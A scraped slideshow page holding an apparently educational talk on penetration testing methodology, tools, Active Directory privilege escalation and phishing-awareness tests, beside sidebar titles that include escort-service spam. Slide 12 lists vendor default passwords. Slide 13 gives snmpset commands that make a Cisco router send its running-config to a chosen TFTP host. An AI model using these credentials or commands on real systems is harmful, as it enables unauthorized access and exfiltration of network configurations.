Choose our Linux Web Hosting for a seamless and successful online presenceChoose our Linux Web Hosting for a seamless and successful online presence
Choose our Linux Web Hosting for a seamless and successful online presence
rajancomputerfbd
 
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
digitalxplive
 
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfBT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
Neo4j
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
ldtexsolbl
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
BrainSell Technologies
 
Figma AI Design Generator_ In-Depth Review.pdf
Figma AI Design Generator_ In-Depth Review.pdfFigma AI Design Generator_ In-Depth Review.pdf
Figma AI Design Generator_ In-Depth Review.pdf
Management Institute of Skills Development
 
Evolution of iPaaS - simplify IT workloads to provide a unified view of data...
Evolution of iPaaS - simplify IT workloads to provide a unified view of  data...Evolution of iPaaS - simplify IT workloads to provide a unified view of  data...
Evolution of iPaaS - simplify IT workloads to provide a unified view of data...
Torry Harris
 
The importance of Quality Assurance for ICT Standardization
The importance of Quality Assurance for ICT StandardizationThe importance of Quality Assurance for ICT Standardization
The importance of Quality Assurance for ICT Standardization
Axel Rennoch
 
Best Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdfBest Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdf
Tatiana Al-Chueyr
 
IPLOOK Remote-Sensing Satellite Solution
IPLOOK Remote-Sensing Satellite SolutionIPLOOK Remote-Sensing Satellite Solution
IPLOOK Remote-Sensing Satellite Solution
IPLOOK Networks
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
Priyanka Aash
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
Zilliz
 
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc
 
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
bhumivarma35300
 
Data Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining DataData Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining Data
Safe Software
 
Three New Criminal Laws in India 1 July 2024
Three New Criminal Laws in India 1 July 2024Three New Criminal Laws in India 1 July 2024
Three New Criminal Laws in India 1 July 2024
aakash malhotra
 
CHAPTER-8 COMPONENTS OF COMPUTER SYSTEM CLASS 9 CBSE
CHAPTER-8 COMPONENTS OF COMPUTER SYSTEM CLASS 9 CBSECHAPTER-8 COMPONENTS OF COMPUTER SYSTEM CLASS 9 CBSE
CHAPTER-8 COMPONENTS OF COMPUTER SYSTEM CLASS 9 CBSE
kumarjarun2010
 
CiscoIconsLibrary cours de réseau VLAN.ppt
CiscoIconsLibrary cours de réseau VLAN.pptCiscoIconsLibrary cours de réseau VLAN.ppt
CiscoIconsLibrary cours de réseau VLAN.ppt
moinahousna
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
sunilverma7884
 

Recently uploaded (20)

find out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challengesfind out more about the role of autonomous vehicles in facing global challenges
find out more about the role of autonomous vehicles in facing global challenges
 
Choose our Linux Web Hosting for a seamless and successful online presence
Choose our Linux Web Hosting for a seamless and successful online presenceChoose our Linux Web Hosting for a seamless and successful online presence
Choose our Linux Web Hosting for a seamless and successful online presence
 
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
The Rise of AI in Cybersecurity How Machine Learning Will Shape Threat Detect...
 
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdfBT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
BT & Neo4j: Knowledge Graphs for Critical Enterprise Systems.pptx.pdf
 
Types of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technologyTypes of Weaving loom machine & it's technology
Types of Weaving loom machine & it's technology
 
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdfAcumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
Acumatica vs. Sage Intacct vs. NetSuite _ NOW CFO.pdf
 
Figma AI Design Generator_ In-Depth Review.pdf
Figma AI Design Generator_ In-Depth Review.pdfFigma AI Design Generator_ In-Depth Review.pdf
Figma AI Design Generator_ In-Depth Review.pdf
 
Evolution of iPaaS - simplify IT workloads to provide a unified view of data...
Evolution of iPaaS - simplify IT workloads to provide a unified view of  data...Evolution of iPaaS - simplify IT workloads to provide a unified view of  data...
Evolution of iPaaS - simplify IT workloads to provide a unified view of data...
 
The importance of Quality Assurance for ICT Standardization
The importance of Quality Assurance for ICT StandardizationThe importance of Quality Assurance for ICT Standardization
The importance of Quality Assurance for ICT Standardization
 
Best Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdfBest Practices for Effectively Running dbt in Airflow.pdf
Best Practices for Effectively Running dbt in Airflow.pdf
 
IPLOOK Remote-Sensing Satellite Solution
IPLOOK Remote-Sensing Satellite SolutionIPLOOK Remote-Sensing Satellite Solution
IPLOOK Remote-Sensing Satellite Solution
 
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
(CISOPlatform Summit & SACON 2024) Digital Personal Data Protection Act.pdf
 
Using LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and MilvusUsing LLM Agents with Llama 3, LangGraph and Milvus
Using LLM Agents with Llama 3, LangGraph and Milvus
 
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In
 
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
High Profile Girls call Service Pune 000XX00000 Provide Best And Top Girl Ser...
 
Data Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining DataData Integration Basics: Merging & Joining Data
Data Integration Basics: Merging & Joining Data
 
Three New Criminal Laws in India 1 July 2024
Three New Criminal Laws in India 1 July 2024Three New Criminal Laws in India 1 July 2024
Three New Criminal Laws in India 1 July 2024
 
CHAPTER-8 COMPONENTS OF COMPUTER SYSTEM CLASS 9 CBSE
CHAPTER-8 COMPONENTS OF COMPUTER SYSTEM CLASS 9 CBSECHAPTER-8 COMPONENTS OF COMPUTER SYSTEM CLASS 9 CBSE
CHAPTER-8 COMPONENTS OF COMPUTER SYSTEM CLASS 9 CBSE
 
CiscoIconsLibrary cours de réseau VLAN.ppt
CiscoIconsLibrary cours de réseau VLAN.pptCiscoIconsLibrary cours de réseau VLAN.ppt
CiscoIconsLibrary cours de réseau VLAN.ppt
 
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
Girls call Kolkata 👀 XXXXXXXXXXX 👀 Rs.9.5 K Cash Payment With Room Delivery
 

Penetration testing, What’s this?

  • 1. Penetration testing What’s this? Dmitry Evteev ( Positive Technologies)
  • 2. Penetration testing internals Penetration testing != simulation of (un)real attacker activities Penetration testing != instrumental scanning with manual vulnerability verification Penetration testing – is a complex of activities aimed to estimate current security process status; is a testing of protection bypassing; is one of security audit methods.
  • 3. Methodology On the one hand, the following best practices are used: Open Source Security Testing Methodology Manual (OSSTMM) Web Application Security Consortium (WASC) Open Web Application Security Project (OWASP) … On the other hand, the following standards are used: Center of Internet Security (CIS) guides ISO 2700x series standards …
  • 4. Abilities Protection mechanism N … X Incident management Some activities were detected but not identified as an attack . 2 Protection mechanism N … X
  • 5. Aims High-level Internal policy ( pentest as an instrument of pressure ) Estimation of current security processes Should be done ( compliance ) Technological Get unauthorized access to internal network from the Internet Gain maximum privileges in main infrastructure systems ( Active Directory, network hardware , DBMS , ERP, etc. ) Get access to certain information resources Get access to certain data ( information )
  • 6. Approaches Perimeter pentest ( with further attacks in internal network ) With or without administrator awareness Wireless network security analysis Internal pentest From average user working station From chosen network segment Certain information system component testing ( security analysis ) Black, Grey and White Box Assessment of employee awareness in information security
  • 7. Real attack VS penetration testing For direct executor pentset is HACKING ! Limitations Compliance with Russian Federation legislation Limited time Minimum impact No testing like DDoS Inconveniences Coordination of actions ( it can run into a very absurd extreme !) Responsibility/Punctuality Advantages Do not need to hide the activities Simplify the network perimeter identification process A possibility to use Grey and White Box methods
  • 8. Instruments Positive Technologies MaxPatrol Nmap/dnsenum/dig … … Immunity Canvas (VulnDisco, Agora Pack, Voip Pack) Metasploit … THC Hydra/THC PPTP bruter/ncrack … Cain and Abel/Wireshark Aircrack … Yersinia … Browser , notepad …
  • 9. web application security problem The most frequent web application vulnerabilities detected by “Black Box” method ( 2009 statistics , http://ptsecurity.ru/analytics.asp )
  • 10. Pentest example: web applications What is web application pentest by BlackBox method? (real world) web server auditor working station Check 1 Check N Vulnerability is detected Vulnerability 1: password bruteforce Impact: access to application ( with limited privileges ) Vulnerability 2: SQL injection Impact: file reading only (magic quotes option is enabled ) Vulnerability is detected Vulnerability 3: path traversal Impact: file reading only ( potentially LFI) Vulnerability 4: predictable identifier of loaded file Vulnerability 3 + Vulnerability 4 = Impact: commands execution on server Next step – FURTHER ATTACK
  • 11. Weak password problem The recommended password policy is used What is domain administrator password? (coincide with login)
  • 12. Pentest example: Password bruteforce ( defaults ) Well known admin:123456 Administrator:P@ssw0rd … SAP (DIAG) SAP*: 06071992, PASS mandants : 000, 001, 066, all new (RFC) SAPCPIC: ADMIN mandants :000, 001, 066, all new … Oracle sys:manager sys:change_on_install … Cisco Cisco:Cisco … …
  • 13. Pentest example: Hello, Pavlik :) snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.31337 integer 4 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.31337 address <tftp_host> snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.31337 string running-config snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 1 snmpset -v 1 -c private <cisco> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.31337 integer 6
  • 14. The problem of access control Network access Network architecture ( DMZ , technological network , user segment , testing environment ) Remote network access Data access Shared resources ( password in clear text , data backup copy , different sensitive data ) Web applications , DBMS , ERP
  • 15. The problem of access control Division of privileges among administrators Users with extended privileges Services (!) with more than required access level General problem of identifiers management
  • 16. Pentest example: Use of vulnerabilities CANVAS && Metasploit
  • 17. Pentest example: Privilege Extension in Active Directory Version 1 : Password bruteforce Version 2 : Vulnerabilities in controller domain services Version 3 : Pass-the-hash attack Version 4: Create new user from domain computer Version 5 : Conduct attack « Poisoning ARP cash » ( for example , hijack RDP session, lower authentication level to LM ) Version 6: NTLM Relay attack Version 7: Find and restore system state domain ( for example , after successful attack on backup server ) Version 8 : Get extended privileges owing to other systems ( for example , control items in company’s root DNS ) Version 9 : Get extended privileges via other systems’ vulnerabilities ( passwords are stored with reversible encryption , insecure protocols are used, etc. ) Version N …
  • 18. Pentest example: Security analysis Network scanning Password is bruteforced ! Exploitation of SQL Injection Command execution on server Privilege gaining Internal resources attack Internal pentest Install MaxPatrol scanner Find vulnerabilities Exploit vulnerabilities Move to network of the Head office Conduct attacks on Head office resources Get maximum privileges in the whole network !
  • 20. Pentest example: Wireless networks
  • 21. Pentest example: Assessment of awareness program efficiency Send provocative messages via e-mail Send provocative messages via ICQ ( and other IM) Distribute data media with provocative messages Question employees Talks ( by telephone , skype )
  • 22. Pentest example: Example of a set of checks Note description Attack Monitored events A note from authority with attached executable file . Spread of network worms . System infection with Trojan horse . Open the mailbox . Execute the attached file . A note from internal person with link to web site . The link points to an executable file . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Load file from w eb server . Execute the file . A note from authority with link to web site . Fishing attacks . Spread of network worms . System infection with Trojan horse . Attacks through software vulnerabilities . Open the mailbox . Follow the link .
  • 23. Pentest example: Assessment of awareness program effeciency Users that follow the link (only 1 pentest) Users that follow the link (regular pentest)
  • 24. Conclusions Penetration testing – is a number of activities that allows to make efficient assessment of current security processes Penetration testing – is search and use of flows in security processes vulnerability management configuration management incident management security management of web applications, DBMS , ERP, wire and wireless networks, etc. etc.
  • 25. Thank you for your attention ! Any questions? [email_address] http://devteev.blogspot.com/

Editor's Notes

  1. Легенда: English alphabet characters in lower case, figures and special suymbols Other symbols